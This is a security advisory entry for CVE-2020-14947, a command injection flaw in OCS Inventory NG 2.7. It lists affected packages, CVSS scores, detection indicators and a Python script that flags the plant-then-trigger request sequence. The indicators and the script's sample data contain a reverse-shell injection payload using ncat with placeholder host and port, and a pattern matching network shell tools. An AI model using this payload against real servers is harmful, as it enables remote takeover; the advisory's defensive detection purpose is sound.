CVE-2020-14947
published 2020-06-30

Priority: P273 | high | 8.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 19.48% (97.0th percentile)
OCS Inventory NG 2.7 allows Remote Command Execution via shell metacharacters to require/commandLine/CommandLine.php because mib_file in plugins/main_sections/ms_config/ms_snmp_config.php is mishandled in get_mib_oid.

Affected

2 ranges

Vendor | Product | Version range | Fixed in
debian | ocsinventory-server | |
factorfx | open_computer_software_inventory_next_generation | |

Detection & IOCs (extracted from sources)

path: require/commandLine/CommandLine.php
path: plugins/main_sections/ms_config/ms_snmp_config.php
url: /index.php?function=admin_conf
url: /index.php?function=SNMP_config
command: ; ncat -e /bin/bash %s %s #
  • Monitor POST requests to /index.php?function=admin_conf containing the parameter SNMP_MIB_DIRECTORY with shell metacharacters (e.g. semicolons, pipes, backticks) — this is the injection point used to plant the payload.
  • Monitor POST requests to /index.php?function=SNMP_config with parameter update_snmp=send — this is the trigger step that causes the injected SNMP_MIB_DIRECTORY value to be executed via get_mib_oid.
  • Alert on the SNMP_MIB_DIRECTORY field containing shell metacharacters (e.g. ';') followed by network tools such as ncat/nc/bash, indicating an attempted reverse shell injection.
  • The exploit follows a multi-step CSRF token harvesting sequence: it GETs admin_conf, POSTs to switch to the SNMP tab ("onglet"), then injects the payload. Look for this rapid sequential access pattern from a single session.
  • The vulnerable code path is get_mib_oid in ms_snmp_config.php passing mib_file unsanitised to CommandLine.php — monitor process spawning from the web server process involving shell commands after SNMP MIB upload/config actions.
  • Exploitation requires valid OCS Inventory NG credentials: the attacker must authenticate before injecting the payload. Brute-force or credential stuffing attempts against /index.php may precede exploitation.
  • The vulnerability is confirmed only in OCS Inventory NG version 2.7; the exploit was tested on Ubuntu 18.04 with PHP 7.2.24. Patched packages are available in Debian bookworm, bullseye, and sid.
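
The plant-then-trigger correlation described in the bullets above, written out as an added detection example (not code from the advisory or from OCS Inventory NG). The event tuple layout, the session identifiers, the severity labels and the 300-second window are assumptions; the sample requests are constructed and carry only the two form fields named above.

```python
import re
from urllib.parse import parse_qs, urlsplit, urlencode

# Shell metacharacters that have no place in a MIB directory path.
META = re.compile(r"[;|&`$<>\n]")
# Network tools named in the detection notes above.
TOOLS = re.compile(r"\b(ncat|nc|bash)\b")
WINDOW = 300  # max seconds between plant and trigger (assumed threshold)

def detect(events):
    """events: (ts, session, method, url, body) tuples -> list of alert tuples."""
    planted = {}  # session -> timestamp of last suspicious SNMP_MIB_DIRECTORY
    alerts = []
    for ts, session, method, url, body in sorted(events):
        if method != "POST":
            continue
        function = parse_qs(urlsplit(url).query).get("function", [""])[0]
        form = parse_qs(body, keep_blank_values=True)
        if function == "admin_conf":
            value = form.get("SNMP_MIB_DIRECTORY", [""])[0]
            if META.search(value):
                severity = "high" if TOOLS.search(value) else "medium"
                planted[session] = ts
                alerts.append((ts, session, "plant", severity))
        elif function == "SNMP_config" and form.get("update_snmp") == ["send"]:
            # The trigger only matters if this session planted a value recently.
            if session in planted and ts - planted[session] <= WINDOW:
                alerts.append((ts, session, "trigger", "critical"))
    return alerts

# Constructed sample: sessA follows the sequence above, sessB is a normal admin.
SAMPLE = [
    (100, "sessA", "GET", "/index.php?function=admin_conf", ""),
    (101, "sessA", "POST", "/index.php?function=admin_conf",
     urlencode({"SNMP_MIB_DIRECTORY": "; ncat -e /bin/bash %s %s #"})),
    (103, "sessA", "POST", "/index.php?function=SNMP_config",
     urlencode({"update_snmp": "send"})),
    (200, "sessB", "POST", "/index.php?function=admin_conf",
     urlencode({"SNMP_MIB_DIRECTORY": "/usr/share/snmp/mibs"})),
    (205, "sessB", "POST", "/index.php?function=SNMP_config",
     urlencode({"update_snmp": "send"})),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

Feeding it real traffic requires request bodies, which default web server access logs do not record; a WAF or reverse-proxy log that captures POST data is the usual source.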

CVSS provenance

nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P
osv | 8.8 | HIGH
vendor_debian | 8.8 | LOW